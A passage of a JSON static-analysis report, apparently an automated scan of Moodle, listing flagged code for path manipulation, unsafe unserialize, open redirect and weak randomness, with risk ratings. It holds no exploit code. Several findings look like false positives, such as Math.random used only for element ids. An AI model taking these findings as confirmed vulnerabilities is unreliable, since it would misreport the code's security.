// just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 143, "positionInStartLine": 21, "positionInEndLine": 36, "appercutAttackItemId": 9385, "startLineNumber": 143}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " parent::checkAllowDirs($realpath, $allowDirs, $uri);\n } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $sources[] = $this->_getFileSource($realpath, $cOptions);\n $basenames[] = basename($realpath, $ext);\n }\n if ($this->selectionId) {\n $this->selectionId .= '_f=';\n }\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 165, "positionInStartLine": 36, "positionInEndLine": 72, "appercutAttackItemId": 9393, "startLineNumber": 165}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $this->log(\"More than one file was missing: '$firstMissingResource', '$secondMissingResource`'\");\n return $options;\n }\n }\n try {\n parent::checkNotHidden($realpath);\n parent::checkAllowDirs($realpath, $allowDirs, $uri);\n } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 159, "positionInStartLine": 28, "positionInEndLine": 53, "appercutAttackItemId": 9391, "startLineNumber": 159}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n continue;\n } else {\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 147, "positionInStartLine": 45, "positionInEndLine": 63, "appercutAttackItemId": 9389, "startLineNumber": 147}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n continue;\n } else {\n $secondMissingResource = $uri;\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 148, "positionInStartLine": 27, "positionInEndLine": 120, "appercutAttackItemId": 9390, "startLineNumber": 148}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $files = explode(',', $_GET['f']);\n if ($files != array_unique($files)) {\n $this->log(\"Duplicate files were specified\");\n return $options;\n }\n if (isset($_GET['b'])) {\n // check for validity\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 120, "positionInStartLine": 26, "positionInEndLine": 46, "appercutAttackItemId": 9384, "startLineNumber": 120}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 145, "positionInStartLine": 16, "positionInEndLine": 56, "appercutAttackItemId": 9387, "startLineNumber": 145}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 79, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 201, "positionInEndLine": 94, "startLineNumber": 201, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t1270853903\n\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t\t// Get content from cache:\n\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t$LOCAL_LANG = $serContent['LOCAL_LANG'];\n\t\t\t}\n\n\t\t\t\t// Checking for EXTERNAL file for non-default language:\n\t\t\tif ($langKey != 'default' && is_string($LOCAL_LANG[$langKey]) && strlen($LOCAL_LANG[$langKey])) {\n", "vulnerId": "APPCUT:62:14527", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 8988, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t1270853903\n\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t\t// Get content from cache:\n\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t$LOCAL_LANG = $serContent['LOCAL_LANG'];\n\t\t\t}\n\n\t\t\t\t// Checking for EXTERNAL file for non-default language:\n\t\t\tif ($langKey != 'default' && is_string($LOCAL_LANG[$langKey]) && strlen($LOCAL_LANG[$langKey])) {\n", "functionName": "Global.t3lib_div::readLLXMLfile", "endLineNumber": 4421, "positionInStartLine": 18, "positionInEndLine": 59, "appercutAttackItemId": 8990, "startLineNumber": 4421}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 8989, "startLineNumber": 2766}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 18, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 4421, "positionInEndLine": 59, "startLineNumber": 4421, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_lib/utils/xhprof_runs.php", "code": " return null;\n }\n\n $contents = file_get_contents($file_name);\n $run_desc = \"XHProf Run (Namespace=$type)\";\n return unserialize($contents);\n }\n\n public function save_run($xhprof_data, $type, $run_id = null) {\n\n // Use PHP serialize function to store the XHProf's\n", "vulnerId": "APPCUT:62:14536", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/xhprof/xhprof_lib/utils/xhprof_runs.php", "code": " xhprof_error(\"Could not find file $file_name\");\n $run_desc = \"Invalid Run Id = $run_id\";\n return null;\n }\n\n $contents = file_get_contents($file_name);\n $run_desc = \"XHProf Run (Namespace=$type)\";\n return unserialize($contents);\n }\n\n public function save_run($xhprof_data, $type, $run_id = null) {\n", "functionName": "Global.XHProfRuns_Default::get_run", "endLineNumber": 120, "positionInStartLine": 4, "positionInEndLine": 45, "appercutAttackItemId": 8997, "startLineNumber": 120}, {"sourceFileName": "moodle/lib/xhprof/xhprof_lib/utils/xhprof_runs.php", "code": " return null;\n }\n\n $contents = file_get_contents($file_name);\n $run_desc = \"XHProf Run (Namespace=$type)\";\n return unserialize($contents);\n }\n\n public function save_run($xhprof_data, $type, $run_id = null) {\n\n // Use PHP serialize function to store the XHProf's\n", "functionName": "Global.XHProfRuns_Default::get_run", "endLineNumber": 122, "positionInStartLine": 11, "positionInEndLine": 33, "appercutAttackItemId": 8998, "startLineNumber": 122}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 11, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 122, "positionInEndLine": 33, "startLineNumber": 122, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Cache/File.php", "code": " if (! @file_put_contents($file, $data, $flag)) {\n $this->_log(\"Minify_Cache_File: Write failed to '$file'\");\n }\n // write control\n if ($data !== $this->fetch($id)) {\n @unlink($file);\n $this->_log(\"Minify_Cache_File: Post-write read failed for '$file'\");\n return false;\n }\n return true;\n }\n", "vulnerId": "APPCUT:62:14662", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/minify/lib/Minify/Cache/File.php", "code": " {\n $flag = $this->_locking\n ? LOCK_EX\n : null;\n $file = $this->_path . '/' . $id;\n if (! @file_put_contents($file, $data, $flag)) {\n $this->_log(\"Minify_Cache_File: Write failed to '$file'\");\n }\n // write control\n if ($data !== $this->fetch($id)) {\n @unlink($file);\n", "functionName": "Global.Minify_Cache_File::store", "endLineNumber": 33, "positionInStartLine": 15, "positionInEndLine": 53, "appercutAttackItemId": 9404, "startLineNumber": 33}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " *\n * @return string\n */\n protected static function _getCacheId($prefix = 'minify')\n {\n $name = preg_replace('/[^a-zA-Z0-9\\\\.=_,]/', '', self::$_controller->selectionId);\n $name = preg_replace('/\\\\.+/', '.', $name);\n $name = substr($name, 0, 100 - 34 - strlen($prefix));\n $md5 = md5(serialize(array(\n Minify_Source::getDigest(self::$_controller->sources)\n ,self::$_options['minifiers'] \n", "functionName": "Global.Minify::_getCacheId", "endLineNumber": 566, "positionInStartLine": 8, "positionInEndLine": 89, "appercutAttackItemId": 9396, "startLineNumber": 566}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " if (! self::$_options['quiet']) {\n self::_errorExit(self::$_options['errorHeader'], self::URL_DEBUG);\n }\n throw $e;\n }\n self::$_cache->store($cacheId, $content);\n if (function_exists('gzencode') && self::$_options['encodeMethod']) {\n self::$_cache->store($cacheId . '.gz', gzencode($content, self::$_options['encodeLevel']));\n }\n }\n } else {\n", "functionName": "Global.Minify::serve", "endLineNumber": 292, "positionInStartLine": 31, "positionInEndLine": 56, "appercutAttackItemId": 9401, "startLineNumber": 292}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " if (null !== self::$_cache && ! self::$_options['debug']) {\n // using cache\n // the goal is to use only the cache methods to sniff the length and \n // output the content, as they do not require ever loading the file into\n // memory.\n $cacheId = self::_getCacheId();\n $fullCacheId = (self::$_options['encodeMethod'])\n ? $cacheId . '.gz'\n : $cacheId;\n // check cache for valid entry\n $cacheIsReady = self::$_cache->isValid($fullCacheId, self::$_options['lastModifiedTime']); \n", "functionName": "Global.Minify::serve", "endLineNumber": 273, "positionInStartLine": 12, "positionInEndLine": 42, "appercutAttackItemId": 9400, "startLineNumber": 273}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " }\n throw $e;\n }\n self::$_cache->store($cacheId, $content);\n if (function_exists('gzencode') && self::$_options['encodeMethod']) {\n self::$_cache->store($cacheId . '.gz', gzencode($content, self::$_options['encodeLevel']));\n }\n }\n } else {\n // no cache\n $cacheIsReady = false;\n", "functionName": "Global.Minify::serve", "endLineNumber": 294, "positionInStartLine": 35, "positionInEndLine": 110, "appercutAttackItemId": 9402, "startLineNumber": 294}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $sources = array();\n $this->selectionId = '';\n $firstMissingResource = null;\n if (isset($_GET['g'])) {\n // add group(s)\n $this->selectionId .= 'g=' . $_GET['g'];\n $keys = explode(',', $_GET['g']);\n if ($keys != array_unique($keys)) {\n $this->log(\"Duplicate group key found.\");\n return $options;\n }\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 46, "positionInStartLine": 12, "positionInEndLine": 51, "appercutAttackItemId": 9395, "startLineNumber": 46}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Cache/File.php", "code": " $flag = $this->_locking\n ? LOCK_EX\n : null;\n $file = $this->_path . '/' . $id;\n if (! @file_put_contents($file, $data, $flag)) {\n $this->_log(\"Minify_Cache_File: Write failed to '$file'\");\n }\n // write control\n if ($data !== $this->fetch($id)) {\n @unlink($file);\n $this->_log(\"Minify_Cache_File: Post-write read failed for '$file'\");\n", "functionName": "Global.Minify_Cache_File::store", "endLineNumber": 34, "positionInStartLine": 19, "positionInEndLine": 69, "appercutAttackItemId": 9405, "startLineNumber": 34}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " ,self::$_options['minifierOptions']\n ,self::$_options['postprocessor']\n ,self::$_options['bubbleCssImports']\n ,self::VERSION\n )));\n return \"{$prefix}_{$name}_{$md5}\";\n }\n \n /**\n * Bubble CSS @imports to the top or prepend a warning if an import is detected not at the top.\n *\n", "functionName": "Global.Minify::_getCacheId", "endLineNumber": 577, "positionInStartLine": 8, "positionInEndLine": 41, "appercutAttackItemId": 9399, "startLineNumber": 577}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Cache/File.php", "code": " public function store($id, $data)\n {\n $flag = $this->_locking\n ? LOCK_EX\n : null;\n $file = $this->_path . '/' . $id;\n if (! @file_put_contents($file, $data, $flag)) {\n $this->_log(\"Minify_Cache_File: Write failed to '$file'\");\n }\n // write control\n if ($data !== $this->fetch($id)) {\n", "functionName": "Global.Minify_Cache_File::store", "endLineNumber": 32, "positionInStartLine": 8, "positionInEndLine": 40, "appercutAttackItemId": 9403, "startLineNumber": 32}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " */\n protected static function _getCacheId($prefix = 'minify')\n {\n $name = preg_replace('/[^a-zA-Z0-9\\\\.=_,]/', '', self::$_controller->selectionId);\n $name = preg_replace('/\\\\.+/', '.', $name);\n $name = substr($name, 0, 100 - 34 - strlen($prefix));\n $md5 = md5(serialize(array(\n Minify_Source::getDigest(self::$_controller->sources)\n ,self::$_options['minifiers'] \n ,self::$_options['minifierOptions']\n ,self::$_options['postprocessor']\n", "functionName": "Global.Minify::_getCacheId", "endLineNumber": 568, "positionInStartLine": 8, "positionInEndLine": 60, "appercutAttackItemId": 9398, "startLineNumber": 568}, {"sourceFileName": "moodle/lib/minify/lib/Minify.php", "code": " * @return string\n */\n protected static function _getCacheId($prefix = 'minify')\n {\n $name = preg_replace('/[^a-zA-Z0-9\\\\.=_,]/', '', self::$_controller->selectionId);\n $name = preg_replace('/\\\\.+/', '.', $name);\n $name = substr($name, 0, 100 - 34 - strlen($prefix));\n $md5 = md5(serialize(array(\n Minify_Source::getDigest(self::$_controller->sources)\n ,self::$_options['minifiers'] \n ,self::$_options['minifierOptions']\n", "functionName": "Global.Minify::_getCacheId", "endLineNumber": 567, "positionInStartLine": 16, "positionInEndLine": 50, "appercutAttackItemId": 9397, "startLineNumber": 567}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Cache/File.php", "code": " if (! @file_put_contents($file, $data, $flag)) {\n $this->_log(\"Minify_Cache_File: Write failed to '$file'\");\n }\n // write control\n if ($data !== $this->fetch($id)) {\n @unlink($file);\n $this->_log(\"Minify_Cache_File: Post-write read failed for '$file'\");\n return false;\n }\n return true;\n }\n", "functionName": "Global.Minify_Cache_File::store", "endLineNumber": 38, "positionInStartLine": 13, "positionInEndLine": 26, "appercutAttackItemId": 9406, "startLineNumber": 38}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 13, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 38, "positionInEndLine": 26, "startLineNumber": 38, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\t\t\treturn 1;\n\t\t\t\t}\n\n\t\t\t\t\t// Use cached version if possible\n\t\t\t\tif ($cacheFileCase && @is_file($cacheFileCase)) {\n\t\t\t\t\t$this->caseFolding['utf-8'] = unserialize(t3lib_div::getUrl($cacheFileCase));\n\t\t\t\t\treturn 2;\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase 'ascii':\n", "vulnerId": "APPCUT:62:14529", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 8995, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\t\t\treturn 1;\n\t\t\t\t}\n\n\t\t\t\t\t// Use cached version if possible\n\t\t\t\tif ($cacheFileCase && @is_file($cacheFileCase)) {\n\t\t\t\t\t$this->caseFolding['utf-8'] = unserialize(t3lib_div::getUrl($cacheFileCase));\n\t\t\t\t\treturn 2;\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase 'ascii':\n", "functionName": "Global.t3lib_cs::initUnicodeData", "endLineNumber": 1102, "positionInStartLine": 35, "positionInEndLine": 81, "appercutAttackItemId": 8996, "startLineNumber": 1102}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 8994, "startLineNumber": 2758}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 35, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 1102, "positionInEndLine": 81, "startLineNumber": 1102, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/google/src/Google/Cache/File.php", "code": " }\n\n if ($this->acquireReadLock($storageFile)) {\n if (filesize($storageFile) > 0) {\n $data = fread($this->fh, filesize($storageFile));\n $data = unserialize($data);\n } else {\n $this->client->getLogger()->debug(\n 'Cache file was empty',\n array('file' => $storageFile)\n );\n", "vulnerId": "APPCUT:62:14537", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/google/src/Google/Cache/File.php", "code": " }\n\n if ($this->acquireReadLock($storageFile)) {\n if (filesize($storageFile) > 0) {\n $data = fread($this->fh, filesize($storageFile));\n $data = unserialize($data);\n } else {\n $this->client->getLogger()->debug(\n 'Cache file was empty',\n array('file' => $storageFile)\n );\n", "functionName": "Global.Google_Cache_File::get", "endLineNumber": 75, "positionInStartLine": 17, "positionInEndLine": 35, "appercutAttackItemId": 9000, "startLineNumber": 75}, {"sourceFileName": "moodle/lib/google/src/Google/Cache/File.php", "code": " }\n }\n\n if ($this->acquireReadLock($storageFile)) {\n if (filesize($storageFile) > 0) {\n $data = fread($this->fh, filesize($storageFile));\n $data = unserialize($data);\n } else {\n $this->client->getLogger()->debug(\n 'Cache file was empty',\n array('file' => $storageFile)\n", "functionName": "Global.Google_Cache_File::get", "endLineNumber": 74, "positionInStartLine": 8, "positionInEndLine": 56, "appercutAttackItemId": 8999, "startLineNumber": 74}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 17, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 75, "positionInEndLine": 35, "startLineNumber": 75, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n );\n", "vulnerId": "APPCUT:62:14441", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n );\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 308, "positionInStartLine": 32, "positionInEndLine": 127, "appercutAttackItemId": 8953, "startLineNumber": 308}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 307, "positionInStartLine": 38, "positionInEndLine": 44, "appercutAttackItemId": 8952, "startLineNumber": 307}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " $('#addtagcoll_form #addtagcoll_name').focus();\n $('#addtagcoll_form #addtagcoll_cancel').on('click', function() {\n panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 305, "positionInStartLine": 32, "positionInEndLine": 83, "appercutAttackItemId": 8951, "startLineNumber": 305}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionRedirect.html", "positionInStartLine": 32, "patternDescription": "If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.", "appercutVulnerName": "Redirecting the User to a Malicious Site", "endLineNumber": 308, "positionInEndLine": 127, "startLineNumber": 308, "patternCodeLanguage": "JavaScript", "appercutRisk": "MEDIUM"}]}, {"pageNumber": 20, "vulnerabilities": [{"sourceFileName": "moodle/question/type/ddimageortext/yui/build/moodle-qtype_ddimageortext-dd/moodle-qtype_ddimageortext-dd.js", "code": " */\nY.extend(DDIMAGEORTEXT_QUESTION, M.qtype_ddimageortext.dd_base_class, {\n touchscrolldisable: null,\n pendingid: '',\n initializer : function() {\n this.pendingid = 'qtype_ddimageortext-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.doc = this.doc_structure(this);\n this.poll_for_image_load(null, false, 10, this.create_all_drag_and_drops);\n this.doc.bg_img().after('load', this.poll_for_image_load, this,\n false, 10, this.create_all_drag_and_drops);\n", "vulnerId": "APPCUT:62:14617", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 61, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 255, "positionInEndLine": 63, "startLineNumber": 255, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/amd/src/inplace_editable.js", "code": "\n var uniqueId = function(prefix, idlength) {\n var uniqid = prefix,\n i;\n for (i = 0; i < idlength; i++) {\n uniqid += String(Math.floor(Math.random() * 10));\n }\n // Make sure this ID is not already taken by an existing element.\n if ($(\"#\" + uniqid).length === 0) {\n return uniqid;\n }\n", "vulnerId": "APPCUT:62:14599", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 55, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 115, "positionInEndLine": 58, "startLineNumber": 115, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/course/dndupload.js", "code": " return;\n }\n this.uploaddialog = true;\n\n var timestamp = new Date().getTime();\n var uploadid = Math.round(Math.random()*100000)+'-'+timestamp;\n var nameid = 'dndupload_handler_name'+uploadid;\n var content = '';\n if (type.handlers.length > 1) {\n content += '<p>'+type.handlermessage+'</p>';\n content += '<div id=\"dndupload_handlers'+uploadid+'\">';\n", "vulnerId": "APPCUT:62:14624", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 45, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 837, "positionInEndLine": 47, "startLineNumber": 837, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddmarker/yui/src/form/js/form.js", "code": "};\nY.extend(DDMARKER_FORM, M.qtype_ddmarker.dd_base_class, {\n fp : null,\n\n initializer : function() {\n var pendingid = 'qtype_ddmarker-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append(\n '<div class=\"ddarea\">' +\n", "vulnerId": "APPCUT:62:14628", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 60, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 27, "positionInEndLine": 62, "startLineNumber": 27, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddmarker/yui/build/moodle-qtype_ddmarker-dd/moodle-qtype_ddmarker-dd.js", "code": " */\nY.extend(DDMARKER_QUESTION, M.qtype_ddmarker.dd_base_class, {\n touchscrolldisable: null,\n pendingid: '',\n initializer : function() {\n this.pendingid = 'qtype_ddmarker-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.doc = this.doc_structure(this);\n this.poll_for_image_load(null, false, 0, this.after_image_load);\n this.doc.bg_img().after('load', this.poll_for_image_load, this,\n false, 0, this.after_image_load);\n", "vulnerId": 